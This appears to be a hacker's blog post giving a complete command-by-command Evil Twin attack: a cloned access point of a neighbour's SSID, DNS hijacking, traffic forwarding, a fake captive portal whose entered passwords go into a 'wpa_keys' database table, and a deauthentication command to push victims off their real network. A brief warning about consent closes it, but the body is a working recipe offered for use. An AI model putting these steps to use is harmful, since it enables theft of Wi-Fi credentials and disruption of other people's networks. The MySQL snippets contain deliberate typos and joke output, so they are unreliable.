Evil Twin Attack with Captive Portal For WiFi Credentials Theft | Command Gist

Yesterday on sudorealm I posted a guide for the Evil Twin attack!

Guide Contents

Like:

• Simple Reconnaissance.

• Setting up your own Access Point with hostapd.

• Distribute ips on connected hosts with dnsmasq.

• Provide connected users with internet with iptables.

• Write your own Rewrite rules on the Apache2 configurations.

• Setup a cool captive portal, with modern Front-End techniques

  • Bootstrap

  • jQuery

  • Client-Side Form validation with Parsley.js Library

• Store credentials to local MySQL Database

You are more than welcome to comment on your thoughts, any ideas whatsoever that you have for the project, and more.

You can clone the project and start playing around immediately.

git clone https://github.com/athanstan/EvilTwin_AP_CaptivePortal.git

Feel free to contribute whatever the hell you want! This is why open source exists! 🤘

Also since you are here! This is my Spotify playlist that I listen to whenever I am coding and hacking! So enjoy 😄🎧🎶

Commands for attack setup

Install dnsmasq

apt-get install dnsmasq -y

Install hostapd

apt-get install hostapd

Put Wireless adapter on monitor mode

airmon-ng start wlan0

Setup dnsmasq.conf

touch dnsmasq.conf

And paste inside the following lines:

#Set the wifi interface
interface=wlan0mon

#Set the IP range that can be given to clients
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h

#Set the gateway IP address
dhcp-option=3,10.0.0.1

#Set DNS server address
dhcp-option=6,10.0.0.1

#Set Server
server=8.8.8.8

#logs
log-queries
log-dhcp

#Redirect all requests to 10.0.0.1
address=/#/10.0.0.1

Setup hostpad.conf

After you have found your target AP with airodump-ng wlan0mon
Type touch hostapd.conf to create the file and paste inside the following lines:

interface=wlan0mon
driver=nl80211
ssid=neighborAP
hw_mode=g
channel=8
macaddr_acl=0
ignore_broadcast_ssid=0

Setup iptables rules

First, create the file with touch iptablesRules.sh and then paste the following lines inside:

iptables --flush
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE 
iptables --append FORWARD --in-interface wlan0mon -j ACCEPT 
iptables -t nat -A POSTROUTING -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

Now type chmod +x iptablesRules.sh to be able to run it with ./iptablesRules.sh

Setup Apache2 Rewrite Rules

You need to add some code on the apache2 configuration file that you can find in kali at /etc/apache2/sites-enabled/000-default.conf once you have found it you can use gedit to open it, and paste the following chunk of code under the </VirtualHost> tag:

<Directory "/var/www/html">
	RewriteEngine On
	RewriteBase /
	RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
	RewriteRule ^(.*)$ http://%1/$1 [R=301,L]
	
	RewriteCond %{REQUEST_FILENAME} !-f
	RewriteCond %{REQUEST_FILENAME} !-d
	RewriteRule ^(.*)$ / [L,QSA]
</Directory>

And then run a2enmod rewrite

Setup the code for the Captive Portal

Copy the contents of the Captive Portal you want to appear inside /var/www/html and then start the server with service apache2 start

Setup MySQL Database

For your connection with the Captive Portal you need a Database with the following settings:

Start MySQL Service
⚠ Be careful, Simple Copy-Pasting is dangerous! So I intentionally added some typos in my MySQL Syntax. 🔎 Let's play find the Bug 🐞

service mysql start

Then mysql -u root -p to enter as root and create a new user, for password just press enter, but first.

Create the Database

MariaDB [(none)]>cretae database eviltwin; 
Query OK, 1 row affected (0.000 sec)

MariaDB [(none)]> use eviltwin;
Database changed

Create a new user and grant him all privileges for the DB

MariaDB [(none)]>cretae user dodgers@localhost identfied by 'duck';
Query OK, 0 rows affected (0.000 sec)

MariaDB [(none)]> grant all priviledges on eviltwin.* to 'dodgers'@ 'localhost';
Query OK, 0 rows affected (0.000 sec)

Create the table

MariaDB [eviltwin]>cretae table wpa_keys(password1 varhcar(32), password2 varhcar(32));
Query OK, 0 rows affected (0.015 sec)

MariaDB [eviltwin]> show tables;
+--------------------------+
| Hidden_NSA_Exploits      |
+--------------------------+
| s3cretsSn0wdendoesntKnow |
+--------------------------+
| wpa_keys                 |
+--------------------------+

Done. You can now interact with the Captive portal with no problems! If you have followed everything correctly that is. 🤓

Deployment Phase

Allocate IP and Subnet mask

ifconfig wlan0mon up 10.0.0.1 netmask 255.255.255.0

Add Routing table

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

Forward Traffic

./iptablesRules.sh

Turn on the Fake Access Point

hostapd hostapd.conf

Enable dnsmasq

dnsmasq -C dnsmasq.conf -d

Bonus Section

After you have successfully connected your second wireless adapter, put it on monitor mode and then type:

aireplay-ng -0 0 -a 00:1D:1C:FD:64:AB wlan1mon

To deauthenticate your target AP and leave him unauthenticated until he falls for your trap! 😈😈😈

The End, Have fun play around become better, and don't hack without consent. This is serious guys, you could get into Jail.

Learn to Hack, then Hack to learn more!

D3ad_R1nger out. 💨

About Comments

if you don't like commenting, here are some alternatives for us to chat:

🤖 https://www.reddit.com/user/stantz16

🐥https://twitter.com/DevThanos

🤵 https://www.linkedin.com/in/athanasios-stantzouris-34ba44141/

Thanks, Yall 🎉🎈🥳